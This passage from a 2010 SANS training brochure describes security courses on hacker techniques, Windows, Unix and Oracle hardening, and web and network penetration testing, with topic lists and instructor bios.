Computer attackers are ripping our networks and systems apart in novel ways while constantly improving their techniques. This course covers the third step of many hacker attacks: gaining access. For each attack, the course explains vulnerability categories, how various tools exploit holes, and how to harden systems or applications against each type of attack. Students who sign an ethics and release form are issued a CD-ROM containing the attack tools examined in class.
Topics: Network-Level Attacks; Gathering and Parsing Packets; Operating System and Application-Level Attacks; Netcat: The Attacker's Best Friend; Hands-on Exercises with a List of Tools

504.4 Hands On – Part 3: Computer and Network Hacker Exploits*
Attackers aren't resting on their laurels, and neither can we. They are increasingly targeting our operating systems and applications with ever-more clever and vicious attacks. This session looks at increasingly popular attack avenues as well as the plague of denial of service attacks.
Topics: Password Cracking; Web Application Attacks; Denial of Service Attacks; Hands-on Exercises with a List of Tools

504.5 Hands On – Part 4: Computer and Network Hacker Exploits*
Once intruders have gained access to a system, they want to keep that access by preventing pesky system administrators and security personnel from detecting their presence. To defend against these attacks, you need to understand how attackers manipulate systems in order to discover the sometimes-subtle hints associated with system compromise. This course arms you with the understanding and tools you need to defend against attackers maintaining access and covering their tracks.
Topics: Maintaining Access; Covering Tracks; Five Methods for Implementing Kernel-Mode Rootkits on Windows and Linux; the Rise of Combo Malware; Detecting Backdoors; Hidden File Detection; Log Editing; Covert Channels; Sample Scenarios

504.6 Hands On: Hacker Tools Workshop*
In this workshop you'll apply skills gained throughout the week in penetrating various target hosts while playing Capture the Flag. Your instructor will act as your personal hacking coach, providing hints as you progress through the game and challenging you to break into the laboratory computers to help underscore the lessons learned throughout the week. Do not keep any sensitive data on your own attacker laptop: SANS is not responsible for your system if someone in the class attacks it in the workshop. Bring the right equipment and prepare it in advance to maximize what you'll learn and the fun you'll have doing it.
Topics: Capture the Flag Contest; Hands-on Analysis; General Exploits; Other Attack Tools and Techniques

*This course is available to Security 504 participants only.

Certified Instructor: John Strand
John Strand currently is the owner and senior security researcher with Black Hills Information Security, and a consultant with Argotek, Inc for TS/SCI programs. As a certified SANS instructor he teaches 504 "Hacker Techniques, Exploits and Incident Handling," 517 "Cutting Edge Hacking Techniques," and 560 "Network Penetration Testing." He is a contributing author of Nagios 3 Enterprise Network Monitoring, and a regular contributor to SearchSecurity's "Ask the Expert" series on the latest information security threats. He also regularly posts videos demonstrating the latest computer attacks and defenses at vimeo.com/album/26207. He started in the practice of computer security with Accenture Consulting in the areas of intrusion detection, incident response, and vulnerability assessment/penetration testing. John then moved on to Northrop Grumman specializing in DCID 6/3 PL3-PL5 (multi-level security solutions), security architectures, and program certification and accreditation. He has a master's degree from Denver University and is currently also a professor at Denver University. In his spare time he writes loud rock music and makes various futile attempts at fly-fishing.

SECURITY 505

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
6 CPE Credits/Day • Laptop Required • Instructor: Jason Fossen

Who Should Attend
• Windows network security engineers and architects
• Windows administrators with security duties
• Anyone with Windows machines who wants to implement the SANS 20 Critical Security Controls
• Active Directory designers and administrators
• Those who must enforce security policies on Windows hosts
• Those deploying or managing a PKI or smart cards
• IIS administrators and Web masters with Web servers at risk
• Administrators who use the command line or scripting to automate their duties and must learn PowerShell (the replacement for CMD scripting and VBScript)

Will you be transitioning from Windows XP to Windows 7?

The Securing Windows course is fully updated for Windows Server 2008-R2 and Windows 7. Most of the content applies to Windows Server 2003 and XP too, but the focus is on 2008/Vista/7.

Concerned about the 20 Critical Security Controls of the Consensus Audit Guidelines? This course will help you implement the Critical Controls relevant to Windows systems, not just audit them, and will walk you through most of the tools step-by-step, too.

As a Windows security expert, how can you stand out from the crowd and offer management more than the usual apply-this-checklist advice? Be a security architect who understands the big picture. You can save your organization money, maintain compliance with regulations, secure your networks, and advance your career all at the same time. How? By leveraging the Windows infrastructure you’ve already paid for.

This program is a comprehensive set of courses for Windows security architects and administrators. It tackles tough problems like Active Directory forest design, how to use Group Policy to lock down desktops, deploying a Microsoft PKI and smart cards, pushing firewall and IPSec policies out to every computer in the domain, securing public IIS Web servers, and PowerShell scripting.

PowerShell is the future of Windows scripting and automation. Easier to learn and more powerful than VBScript, PowerShell is an essential tool for automation and scalable management. If there is one skill that will most benefit the career of a Windows specialist, it’s scripting. Most of your competition lacks scripting skills, so it’s a great way to make your resume stand out. Scripting skills are also essential for being able to implement the 20 Critical Security Controls.

You are encouraged to bring a virtual machine running Windows Server 2008 Enterprise Edition configured as a domain controller, but this is not a requirement for attendance since the instructor will demo everything discussed on-screen. You can get a free evaluation version of Server 2008 from Microsoft’s Web site (just do a Google search on “site:microsoft.com Server 2008 trial”). You can use VMware, Virtual PC or any other virtual machine software.

This is a fun and fascinating course, a real eye-opener even for Windows administrators with years of experience. Come see why there’s a lot more to Windows security than just applying patches and changing passwords; come see why a Windows network needs a security architect.

AUTHOR STATEMENT
I’ve happily been with SANS for over a decade, and the courses I write are always guided by two questions: 1) What do administrators need to know to secure their networks? and 2) What should administrators learn to advance their careers as IT professionals? I’m not a Microsoft employee or a Microsoft-basher, so you won’t get either kind of propaganda here; my concern is with the health of your network and your career. As a security consultant I’ve seen it all (good, bad, and ugly) and my experience goes into the manuals I write for SANS and the stories I tell in seminar. The Securing Windows course is packed with interesting and useful advice which isn’t so easy to find on the Internet. We always have a good time, so I hope to meet you at the next conference! -Jason Fossen

GIAC Certification: www.giac.org • Cyber Guardian Program: www.sans.org/cyber-guardian
Securing Windows is an advanced, focused course for system administrators with security responsibilities. Senior system administrators earn from $45,000 to $90,000. Also, Windows auditors with this level of system knowledge are highly sought after and earn salaries often 10 - 20% higher than other auditors. This course picks up where MCSE training stops.

505.1 Securing Active Directory and DNS
On day one, we will quickly get you on top of what you need to know about Active Directory security and delegation of authority. Importantly, this course is not an introduction to AD or an overview of basic administration topics. This is a course for people who already manage AD, need to plan a redeployment, or must lock down what they’ve got.
Topics: Securing Domain Controllers; Active Directory Access Control Lists; Delegation of Authority; Forest Designs; Secure Dynamic DNS

505.2 Enforcing Critical Controls With Group Policy
In this course, we’ll see how to use Group Policy to lock down desktops and servers, implement many of the SANS 20 Critical Controls, enforce regulatory compliance changes, configure services and applications, and scale our work out to thousands of systems conveniently. If you’ve never seen Group Policy before, you’re in for a shock (a good shock!) and if you’ve been using Group Policy for years, this course should expand your understanding even more since the emphasis is on security, not Group Policy in general.
Topics: Security Templates; What is Group Policy?; Fine-Tuning Group Policy; Updating Vulnerable Software; Pushing Out Scripts; Enforcing Critical Controls

505.3 Windows PKI, EFS, and BitLocker
Planning a PKI or data encryption project isn’t easy, and mistakes and redeployments can be costly, so this day in part is designed to assist in the planning process to help avoid these mistakes. If you’re not encrypting laptops and portable drives now, you will be soon, and BitLocker/EFS can save your organization money while making the deployment relatively easy. Using Group Policy, you can manage most features of BitLocker and EFS on all your machines without having to configure each of them by hand.
Topics: Why Must I Have A PKI?; How To Install The Windows PKI; How To Manage Your PKI; Deploying Smart Cards; Encrypting File System; BitLocker Drive Encryption

505.4 Windows Firewall, IPSec, Wireless, and VPNs
Day four is about how to use the Windows Firewall, IPSec, RADIUS, the RRAS VPN gateway service, and WPA2 for 802.11 wireless to secure the network layer in our Windows environments. Virtually all these client settings, including wireless settings, are manageable through Group Policy.
Topics: The New Windows Firewall; Why Use IPSec?; Creating IPSec Policies; RADIUS for Network Security; Virtual Private Networking; Securing Wireless Networks

505.5 Securing IIS 7.0
The demand for IIS security personnel is great because IIS is so widely deployed. This day focuses on IIS 7.0 in Windows Server 2008, but many of the principles discussed will apply to IIS 6.0 as well. You won’t be left out if you’re still running IIS 6.0. If you’re new to IIS 7.0, this course will get you up to speed.
Topics: Server Hardening; XML Configuration System; IIS Authentication and Authorization; Web-Based Applications; Logging and Auditing; FTP Over SSL (FTPS)

505.6 Windows PowerShell
To attend the course, you don’t have to bring a laptop, but if you do, get the latest version of PowerShell from Microsoft (www.microsoft.com/powershell). A CD-ROM will be handed out by the instructor with sample scripts and other files with which to experiment. During the course, we will walk through all the essentials of PowerShell together. The course presumes nothing; you don’t have to have any prior scripting experience to attend. And, most importantly, be prepared to have fun: PowerShell is just plain cooooooool.
Topics: What is PowerShell?; Cmdlets; Running Scripts; Namespace Providers; Piping Objects; Parameter Binding; Regular Expressions; Functions and Filters; The .NET Class Library; Using Properties and Methods at the Command Line; Accessing COM Objects: WMI, ADSI, ADO, etc.; Security and Execution Policy; And lots and lots of sample scripts to walk through...

SANS Faculty Fellow
Jason Fossen
Jason Fossen is a principal security consultant at Enclave Consulting LLC, a published author, and a frequent public speaker on Microsoft security issues. He is the sole author of the SANS’ week-long Securing Windows course (SEC505), maintains the Windows day of Security Essentials (SEC401.5), and has been involved in numerous other SANS’ projects since 1998. He graduated from the University of Virginia, received his master’s degree from the University of Texas at Austin, and holds a number of professional certifications. He currently lives in Dallas, Texas. Jason blogs about Windows Security Issues on the SANS Windows Security Blog. https://blogs.sans.org/windows

“The course introduced a wide range of technologies and issues I was completely unaware of - great exposure to new ideas. Jason’s depth of knowledge and examples are of great value.”
-JEFF RUFF, AASKI TECHNOLOGIES
SECURITY 506

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am-5:00pm
36 CPE Credits • Laptop Required • Instructor: Hal Pomeranz

Who Should Attend
• Security professionals looking to learn the basics of securing Unix operating systems
• Experienced administrators looking for in-depth descriptions of attacks on Unix systems and how they can be prevented
• Administrators needing information on how to secure common Internet applications on the Unix platform
• Auditors, incident responders, and InfoSec analysts who need greater visibility into Linux and Unix security tools, procedures, and best practices

Experience in-depth coverage of Linux and Unix security issues.

Examine how to mitigate or eliminate general problems that apply to all Unix-like operating systems including vulnerabilities in the password authentication system, file system, virtual memory system, and applications that commonly run on Linux and Unix. This course provides specific configuration guidance and practical, real-world examples, tips, and tricks.

Throughout this course, you will become skilled at utilizing freely available tools to handle security issues, including SSH, AIDE, sudo, lsof, and many others. SANS’ practical approach with “hands-on” exercises every day ensures that you can start using these tools as soon as you return to work. We will also put these tools to work in a special section that covers simple forensic techniques for investigating compromised systems.

Sampling of Topics
• Memory Attacks, Buffer Overflows
• File System Attacks, Race Conditions
• Trojan Horse Programs and Rootkits
• Monitoring and Alerting Tools
• Unix Logging and Kernel-Level Auditing
• Building a centralized logging infrastructure
• Network Security Tools
• SSH for Secure Administration
• Server “lockdown” for Linux and Unix
• Controlling root access with sudo
• SELinux and chroot() for application security
• DNSSEC deployment and automation
• mod_security and Web Application Firewalls
• Secure Configuration of BIND, Sendmail, Apache
• Forensic Investigation

PREREQUISITE
Students must possess at least a working knowledge of Unix. Most students who attend the track have a minimum of 3-5 years of Unix System Administration experience.

AUTHOR STATEMENT
A wise man once said, “How are you going to learn anything if you know everything already?” And yet there seems to be a quiet arrogance in the Unix community that we’ve figured out all of our security problems, as if to say, “Been there, done that.” All I can say is that what keeps me going in the Unix field, and the security industry in particular, is that there is always something new to learn, discover, or invent. In fifteen plus years on the job, what I’ve learned is how much more there is that I can learn. I think this is also true for the students in my courses. I regularly get comments back from students that say things like, “I’ve been using Unix for 20 years and I still learned a lot in this class.” That’s really rewarding.
- Hal Pomeranz

GIAC Certification: www.giac.org • Cyber Guardian Program: www.sans.org/cyber-guardian
Securing Linux/Unix is an advanced, focused course for system administrators with security responsibilities. Senior system administrators earn from $45,000 to $90,000. Unix auditors with this level of system knowledge are highly sought after. They can earn salaries often 10-20% higher than other auditors. According to the “2003 IT Market Compensation Study,” IT organizations report that ‘Skilled Unix Administrator’ is one of the two most difficult positions to fill.

506.1 Hands On: Common Issues and Vulnerabilities
This section provides in-depth coverage of Linux/Unix security issues with an overview of the most common issues and vulnerabilities facing Unix security professionals both past and present. In addition to analyzing each vulnerability and its associated risks, the course makes recommendations on living with (or sometimes living without!) the given service. This is a full-disclosure course with in-class demos of actual exploits and hands-on exercises to experiment with various examples of malicious software.
Topics: Memory Attacks and Overflows; Remote Attacks; The Untrustworthy File System; Programmatic Attacks; Trojan Horse Programs; Password Attacks; Physical Issues

506.2 Hands On – Part 1: Hardening Linux/Unix Systems
This course is a simple step-by-step recipe for building a hardened Unix server platform. While focusing primarily on Linux and Solaris syntax, the course contains valuable lessons and strategies for administrators of any Unix-like operating system. Students get a chance to practice these techniques hands on using their own laptops.
Topics: Installation; Boot-Time Configuration; Kernel Tuning For Security; File System Access Control; Logging; User Access Control; Warning Banners

506.3 Hands On – Part 2: Hardening Linux/Unix Systems
This section takes a more in-depth look at additional tools required for hardening Linux and Unix operating systems. This includes Open Source tools, like AIDE and sudo, and host-based firewalls using IP Tables and IP Filter. Syslog-NG will be introduced as a mechanism for creating a centralized logging infrastructure. The course is also seasoned with plenty of SSH tips and tricks to overcome many common administrative obstacles. Students will get the opportunity to practice and experiment with these tools in class so that they can be ready to start using them as soon as they return to work.
Topics: SSH Tips and Tricks; Sudo; AIDE; Host-based Firewalls; Centralized Logging with Syslog-NG

506.4 Hands On – Part 1: Running Linux/Unix Applications Securely
This course examines common application security tools and techniques. The SCP-Only Shell will be presented as an example of using an application under chroot() restriction and as a more secure alternative to file sharing protocols like anonymous FTP. The SELinux application whitelisting mechanism will be examined in depth. Tips for troubleshooting common SELinux problems will be covered, and students will learn how to craft new SELinux policies from scratch for new and locally developed applications. Significant hands-on time will be provided for students to practice these concepts.
Topics: chroot() for Application Security; The SCP-Only Shell; SELinux Basics; SELinux and the Reference Policy; Application Security Challenge Exercise

506.5 Hands On – Part 2: Running Linux/Unix Applications Securely
This course is a full day of in-depth analysis on how to manage some of the most popular application level services securely on a Linux/Unix platform. We will tackle the practical issues involved with securing three of the most commonly-used Internet servers on Linux and Unix: BIND, Sendmail, and Apache. Beyond basic security configuration information, we will take an in-depth look at topics like DNSSec and Web Application Firewalls with mod_security and the Core Rules.
Topics: BIND; DNSSec; Sendmail; Apache; Web Application Firewalls with mod_security

506.6 Hands On: Digital Forensics for Linux/Unix
This hands-on course is designed to be an information-rich introduction devoted to basic forensic principles and techniques for investigating compromised Linux and Unix systems. At a high level, it introduces the critical forensic concepts and tools that every administrator should know and provides a real-world compromise for students to investigate using the tools and strategies discussed in class.
Topics: Tools Throughout; Forensic Preparation and Best Practices; Incident Response and Evidence Acquisition; Media Analysis; Incident Reporting

SANS Faculty Fellow
Hal Pomeranz
Hal is founder and CEO of Deer Run Associates, a systems management and security consulting firm. He has spent more than 15 years managing systems and networks for some of the largest commercial, government, and academic organizations in the country. He is the technical editor for SysAdmin Magazine and was the recipient of the 2001 SAGE Outstanding Achievement award for his teaching and leadership in the field of system administration. Hal participated in the first SANS training program and designed the SANS Step-by-Step course model. He is a top-rated instructor and author on topics ranging from information security to system and network management to Perl programming. Hal also blogs about command-line tips on a regular basis. http://blog.commandlinekungfu.com
SECURITY 509

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am-5:00pm
36 CPE Credits • Laptop Required • Instructor: Tanya Baccam

Who Should Attend
• Oracle database administrators responsible for installation and management of Oracle databases
• Developers who wish to create secure data access applications and Web sites
• Security professionals who are concerned about the security of their organization’s Oracle databases
• Auditors and penetration testers who need to evaluate the security of Oracle databases
• Security managers who need to understand the security risks with data held in an Oracle database

Experts agree that Oracle is one of the most complex software packages available today.

Unfortunately, complexity often introduces an increased risk for vulnerabilities. These vulnerabilities are being increasingly targeted by attackers. It is not uncommon for the SANS Internet Storm Center to see hundreds of thousands of hack attempts against Oracle databases each month.

SANS recognizes the need for comprehensive Oracle security training to help organizations protect their most critical information resources. In this course, the student is led through the process of auditing and securing Oracle by defining the risks to data, using auditing techniques for detecting unauthorized access attempts, using Oracle access controls and user management functions, developing reliable backup and restore processes and techniques to secure the Oracle database, as well as applications.

Throughout the course the student will be exposed to the database as seen through the eyes of an attacker, including public and unreleased techniques that are used to compromise the integrity of the database or escalate a user’s privileges. In this fashion, the student gains a better understanding of how an attacker sees a database as a target, and how we can configure the database to be resistant to known and unknown attacks.

This course has been updated for versions of Oracle up to and including 11g on Unix and Windows operating systems.

AUTHOR STATEMENT
Oracle is one of the most exciting and challenging databases that exist. When it comes to securing an Oracle database, there are many challenges that Administrators and security professionals will face. This course is designed to be a fully comprehensive and intense introduction to planning, auditing and securing an Oracle database. The course doesn’t just mention the vulnerabilities, but it explains why the issues may exist and how they could be leveraged by an attacker. Multiple hands-on exercises reinforce the content we learn in class. This aids the student in thinking like an attacker, which needs to be done to protect the databases. Students are often amazed at how many different ways exist that an attacker might use to compromise an Oracle database! Ultimately, the goal is to teach how to protect one of the most important organizational assets – the data. Data provides information, information leads to knowledge and knowledge is power in the business world. This course is an exciting and interesting journey on protecting this critical organizational asset! -Tanya Baccam

“This course is excellent! There is a wealth of information to be learned in this course. It is the best Oracle Security course I have taken thus far! I highly recommend it!”
-ANGELA BELL, US GOVERNMENT ACCOUNTABILITY OFFICE
Securing Oracle gives students a solid grounding in how to audit and secure an Oracle database installation. Students will develop the ability to define and implement solid robust Oracle security standards and policies and learn to specify or create useful tools to audit an Oracle database and understand how to secure it.

509.1 Hands On: Securing Oracle Foundations*
Students are introduced to various techniques used by an attacker to compromise the database including buffer overflows, SQL injection attacks, exploiting Oracle stored procedures, and cross-site scripting attacks. We also look at the process of installing the database in a secure fashion after hardening the host operating system with strong filesystem permissions.
Topics: Securing Oracle; Foundations; Oracle Attack Vectors; Attacking Oracle; Host Operating System Security; Hunting for Passwords

509.2 Hands On: Securing Oracle’s Authentication Process*
The Oracle authentication process is examined including single sign-on and unified authentication with LDAP or the Oracle Internet Directory product. We also explore Oracle default user accounts, roles, and grants including audit techniques to identify user accounts with weak passwords using password cracking techniques. Auditing user accounts and application schema accounts are also discussed in detail covering third party authentication, shared accounts, proxy users, and embedded accounts implemented in 3rd party applications. The day concludes with a complete discussion of password management including enforcing and creating a password management policy and utilizing profiles to control access to database resources.
Topics: Authentication Methods; Default Users and Password Audits; Schema and Application Owners; Implementing Password Management

509.3 Hands On: Oracle Access Controls – Configuration*
This day examines techniques that can be used to deploy access control mechanisms in-depth by protecting database objects. We also cover many of the countless database configuration options with recommendations that make the database more resistant to common attacks. The final part of the day is dedicated to the problems associated with the growing number of PUBLIC privileges including the techniques authenticated users can use to escalate their privilege levels.
Topics: Access and Output; Roles and Users; Configuration; PUBLIC Privileges, Profiles, Packages and Objects

509.4 Hands On: Auditing Oracle*
This day delves into auditing the Oracle environment. We’ll examine the built-in Oracle auditing features including the new enhancements to Fine Grain Auditing. Forensic assessment of Oracle databases is also covered in this day including data recovery and retracing the steps of an attacker. If your organization is encumbered by federal restrictions in information management such as HIPAA or GLBA, this day will provide vital information that you can deploy immediately after completing this course.
Topics: Oracle Auditing - Myths and Facts; Reviewing the Audit Trail; Forensics; Fine Grained Auditing

509.5 Hands On: Networking, Encryption, and Developer Tools*
The Oracle listener is usually the first recipient of attacks from adversaries seeking to compromise the database. This day covers networking topics associated with the database including securing the listener configuration and network design recommendations for the database and administrative workstations. The day continues to discuss the challenges of backup and restore of the database including redo logs and database mirroring and media storage and destruction. We conclude the day by looking at techniques to secure the SQL*Plus and iSQL*Plus tools including techniques to enforce and restrict the use of specific applications that are allowed to connect to the database.
Topics: Auditing the Oracle Listener; Network Access to Oracle; Database Backup and Recovery; Restricting Developer and Access Tools

509.6 Hands On: Development and Securing Applications*
End-user tools created with PL/SQL and Java can introduce their own security risks. This day covers secure programming for the database including protecting source confidentiality and integrity and setting resource limits to prevent denial of service attacks. In addition, we look at encrypting data and issues with tools such as debuggers. We also look at the most visible Web-facing components of the database and cover some of the main security issues of the Oracle application server. The final module of this intense day covers where we think Oracle security is going, exploring early techniques in the design of viruses and worms specific to Oracle.
Topics: Oracle Programming Issues; Controlling Applications; Application Internals; Exercising Control; Introduction to Securing iAS; Oracle Security Future
*This course is available to Security 509 participants only.

Senior Instructor
Tanya Baccam
Tanya is a senior SANS instructor as well as a SANS courseware author. She also provides many security consulting services, such as system audits, vulnerability and risk assessments, database assessments, Web application assessments, and penetration testing. She has previously worked as the director of assurance services for a security services consulting firm, as well as manager of infrastructure security for a healthcare organization. She also served as a manager at Deloitte & Touche in the Security Services practice. Throughout her career she has consulted with many clients about their security architecture, including areas such as perimeter security, network infrastructure design, system audits, Web server security, and database security. She has played an integral role in developing multiple business applications and currently holds the CPA, GCFW, GCIH, CISSP, CISM, CISA, CCNA, CCSE, CCSA, and Oracle DBA certifications.
SECURITY 542

Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: Kevin Johnson

Who Should Attend
• General security practitioners
• Web site designers and architects
• Developers

Assess Your Web Apps In Depth.

Web applications are a major point of vulnerability in organizations today. Web app holes have resulted in the theft of millions of credit cards, major financial and reputational damage for hundreds of enterprises, and even the compromise of thousands of browsing machines that visited Web sites altered by attackers. In this intermediate- to advanced-level class you’ll learn the art of exploiting Web applications so you can find flaws in your enterprise’s Web apps before the bad guys do. Through detailed, hands-on exercises and training from a seasoned professional, you will be taught the four-step process for Web application penetration testing. You will inject SQL into back-end databases, learning how attackers exfiltrate sensitive data. You will utilize Cross-Site Scripting attacks to dominate a target infrastructure in our unique hands-on laboratory environment. And, you will explore various other Web app vulnerabilities, in depth, with tried-and-true techniques to finding them, using a structured testing regimen. You will learn the tools and methods of the attacker, so that you can be a powerful defender.

On day one, we will study the attacker’s view of the Web. We will learn an attack methodology and how the pen-tester uses JavaScript within the test. On day two, we will study the art of reconnaissance, specifically targeted to Web applications. We will also examine the mapping phase as we interact with a real application to determine its internal structure. During day three, we will continue our test by starting the discovery phase using the information we gathered on day two. We will focus on application/server-side discovery. On day four, we will continue discovery, focusing on client-side portions of the application, such as Flash objects and Java applets. On day five, we will move into the final stage of exploitation. Students will use advanced exploitation methods to gain further access within the application. Day six will be a Capture the Flag event where the students will be able to use the methodology and techniques explored during class to find and exploit the vulnerabilities within an intranet site.

Throughout the class, you will learn the context behind the attacks so that you intuitively understand the real-life applications of our exploitation. In the end, you will be able to assess your own organization’s Web applications to find some of the most common and damaging Web application vulnerabilities today.

AUTHOR STATEMENT
Testing the security of Web applications is not as simple as just knowing what SQL injection and cross-site scripting mean. Successful testers understand that methodical, thorough testing is the best means of finding the vulnerabilities within the applications. This requires a deep understanding of how Web applications work and what attack vectors are available. This course provides that understanding by examining the various parts of a Web application penetration. When teaching the class, I especially enjoy the use of real-world exercises and the in-depth exploration of Web penetration testing.
-Kevin Johnson

“This course was a huge eye opener for me. I will be handling my future pen tests a lot differently from now on.”
-CARL SKILES, AMERINET

“This is the first course I have taken where I was completely unaware of time – very engaging. Kevin is very knowledgeable and an excellent representative of the SANS Institute.”
-SCOTT ASHTON, POLICE & FIRE FCU

GIAC Certification: www.giac.org • Cyber Guardian Program: www.sans.org/cyber-guardian
542.1 Hands On: The Attacker’s View of the Web*


We begin by examining Web technology – protocols, languages, clients, and server architectures
– from the attacker’s perspective. Then we cover the four steps of Web application pen tests:
reconnaissance, mapping, discovery, and exploitation.
Topics: Overview of the Web from a Penetration Tester’s Perspective; Exploring the Various Servers and Clients; Discussion
of the Various Web Architectures; Discover How Session State Works; Discussion of the Different Types of
Vulnerabilities; Define a Web Application Test Scope and Process; Define Types of Penetration Testing

542.2 Hands On: Reconnaissance and Mapping*
Reconnaissance includes gathering publicly-available information regarding the target application and organization, identifying machines that support our target application, and building a profile of each server. Then, we will build a “map” of the application by identifying the components, analyzing the relationship between them, and determining how they work together.
Topics: Discover the Infrastructure Within the Application; Identify the Machines and Operating Systems; SSL Configurations and Weaknesses; Explore Virtual Hosting and its Impact on Testing; Learn Methods to Identify Load Balancers; Software Configuration Discovery; Explore External Information Sources; Google Hacking; Learn Tools to Spider a Web site; Scripting to Automate Web Requests and Spidering; Application Flow Charting; Relationship Analysis Within an Application; JavaScript for the Attacker

542.3 Hands On: Server-Side Discovery*
We will continue with the discovery phase, exploring both manual and automated methods of discovering vulnerabilities within the applications as well as exploring the interactions between the various vulnerabilities and the different user interfaces that Web apps expose to clients.
Topics: Learn Methods to Discover Various Vulnerabilities; Explore Differences Between Different Data Back-ends; Explore Fuzzing and Various Fuzzing Tools; Discuss the Different Interfaces Web Sites Contain; Understand Methods for Attacking Web Services

542.4 Hands On: Client-Side Discovery*
Learning how to discover vulnerabilities within client-side code, such as Java applets and Flash objects, includes use of tools to decompile the objects and applets. We have a detailed discussion of how AJAX and Web service technology enlarges the attack surface that pen testers leverage.
Topics: Learn Methods to Discover Various Vulnerabilities; Learn Methods to Decompile Client-side Code; Explore Malicious Applets and Objects; Discover Vulnerabilities in Web Applications Through Their Client Components; Understand Methods for Attacking Web Services; Understand Methods for Testing Web 2.0 and AJAX-based Sites; Learn How AJAX and Web Services Change Penetration Tests; Learn the Attacker’s Perspective on Python and PHP

542.5 Hands On: Exploitation*
Launching exploits against real-world applications includes exploring how they can help in the testing process, gaining access to browser history, port scanning internal networks, and searching for other vulnerable Web applications through zombie browsers.
Topics: Explore Methods to Zombify Browsers; Discuss Using Zombies to Port Scan or Attack Internal Networks; Explore Attack Frameworks; Walk Through an Entire Attack Scenario; Exploit the Various Vulnerabilities Discovered; Leverage the Attacks to Gain Access to the System; Learn How to Pivot our Attacks Through a Web Application; Understand Methods of Interacting with a Server Through SQL Injection; Exploit Applications to Steal Cookies; Execute Commands Through Web Application Vulnerabilities

542.6 Hands On: Capture the Flag*
The goal of this event is for students to use the techniques, tools, and methodology learned in class against a realistic intranet application. Students will be able to use a virtual machine with the SamuraiWTF Web pen testing environment in class and can apply that experience in their workplace.
Topics: Capture the Flag

Certified Instructor: Kevin Johnson
Kevin Johnson is a senior security analyst with InGuardians. Kevin came to security from a development and system-administration background. He has many years of experience performing security services for Fortune 100 companies and in his spare time contributes to a large number of open-source security projects. Kevin founded and leads the development on the Basic Analysis and Security Engine (BASE) project, the most popular Web interface for the Snort intrusion detection system. Kevin is an instructor for SANS, teaching both SEC504: Hacker Techniques, Exploits, and Incident Handling and SEC542: Web App Penetration Testing and Ethical Hacking. He has presented to many organizations, including Infragard, ISACA, ISSA, and the University of Florida.

Register at www.sans.org/network-security-2010
*This course is available to Security 542 participants only.
SECURITY 560
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: Ed Skoudis

Who Should Attend
• Penetration testers
• Ethical hackers
• Auditors who need to build deeper technical skills
• Security personnel whose job involves assessing target networks and systems to find security vulnerabilities

Find Security Flaws Before the Bad Guys Do.
Security vulnerabilities, such as weak configurations, unpatched systems, and botched architectures, continue to plague organizations. Enterprises need people who can find these flaws in a professional manner to help eradicate them from our infrastructures. Lots of people claim to have penetration testing, ethical hacking, and security assessment skills, but precious few can apply these skills in a methodical regimen of professional testing to help make an organization more secure. This class covers the ingredients for successful network penetration testing to help attendees improve their enterprise’s security stance.

We address detailed pre-test planning, including setting up an effective penetration testing infrastructure and establishing ground rules with the target organization to avoid surprises and misunderstanding. Then we discuss a time-tested methodology for penetration and ethical hacking across the network, evaluating the security of network services and the operating systems behind them.

Attendees will learn how to perform detailed reconnaissance, learning about a target’s infrastructure by mining blogs, search engines, and social networking sites. We’ll then turn our attention to scanning, experimenting with numerous tools in hands-on exercises. Our exploitation phase will include the use of exploitation frameworks, stand-alone exploits, and other valuable tactics, all with hands-on exercises in our lab environment. The class also discusses how to prepare a final report tailored to maximize the value of the test from both a management and technical perspective. The final portion of the class includes a comprehensive hands-on exercise in which students will conduct a penetration test against a hypothetical target organization following all of the steps.

The course also describes the limitations of penetration testing techniques and other practices that can be used to augment penetration testing to find vulnerabilities in architecture, policies, and processes. We address how penetration testing should be integrated as a piece of a comprehensive enterprise information security program.

IMPORTANT NOTE: SEC560 is one of the most technically rigorous courses offered by SANS. Attendees are expected to have a working knowledge of TCP/IP; cryptographic routines, such as DES, AES, and MD5; and the Windows and Linux command lines before they step into class. Although SEC401 and SEC504 are not prerequisites for SEC560, these courses cover the groundwork that all SEC560 attendees are expected to know. This course is technically in-depth and programming knowledge is NOT required.

AUTHOR STATEMENT
Successful penetration testers don’t just throw a bunch of hacks against an organization and regurgitate the output of their tools. Instead, they need to understand how these tools work in depth and conduct their test in a careful, professional manner. This course explains the inner workings of numerous tools and their use in effective network penetration testing and ethical hacking projects. When teaching the class, I particularly enjoy the hands-on exercises that culminate in a final pen-testing extravaganza lab.
-Ed Skoudis
“This course offers a great overview of the methodology and
issues to consider when planning a penetration test.”
-GREG SUTHERLAND, MCKEE FOODS CORP

560.1 Hands On: Planning, Scoping, and Recon*
This course provides extensive details of penetration testing preparation and methodology, which are immensely useful in meeting the Payment Card Industry (P CI) Data Security Standard (DSS) Requirement 11.3 on penetration testing. We cover building a penetration testing and ethical hacking infrastructure that includes the appropriate hardware, software, network infrastructure, and test tools arsenal, with specific low-cost recommendations. This portion of the course also describes how to plan the specifics of a test, carefully scoping the project and defining the rules of engagement.
Topics: The Mindset of the Professional Pen Tester; Legal Issues; Reporting; Types of Penetration Tests and Ethical Hacking Projects; Detailed Recon; Mining Search Engine Results with Aura/Wikto/EvilAPI

560.2 Hands On: Scanning*
This component of the course focuses on the vital task of scanning a target environment, creating a comprehensive inventory of machines, and then evaluating those systems to find potential vulnerabilities. We’ll look at some of the most useful scanning tools freely available today, experimenting with them in our hands-on lab. Because vulnerability-scanning tools inevitably give us false positives, we’ll also look at techniques for false-positive reduction with hands-on exercises.
Topics: Overall Scanning Tips; tcpdump for the Pen Tester; Protocol Anomalies; The Nmap Scripting Engine; Version Scanning with Nmap and Amap; False Positive Reduction

560.3 Hands On: Exploitation*
In this section we look at the many kinds of exploits that a penetration tester or ethical hacker can use to compromise a target machine. We’ll analyze in detail the differences between server-side, client-side, and local privilege escalation exploits, exploring some of the most useful recent exploits in each category. We’ll see how these exploits are packaged in frameworks like Metasploit and its mighty Meterpreter. We’ll also look at post-exploit analysis of machines and pivoting to find new targets.
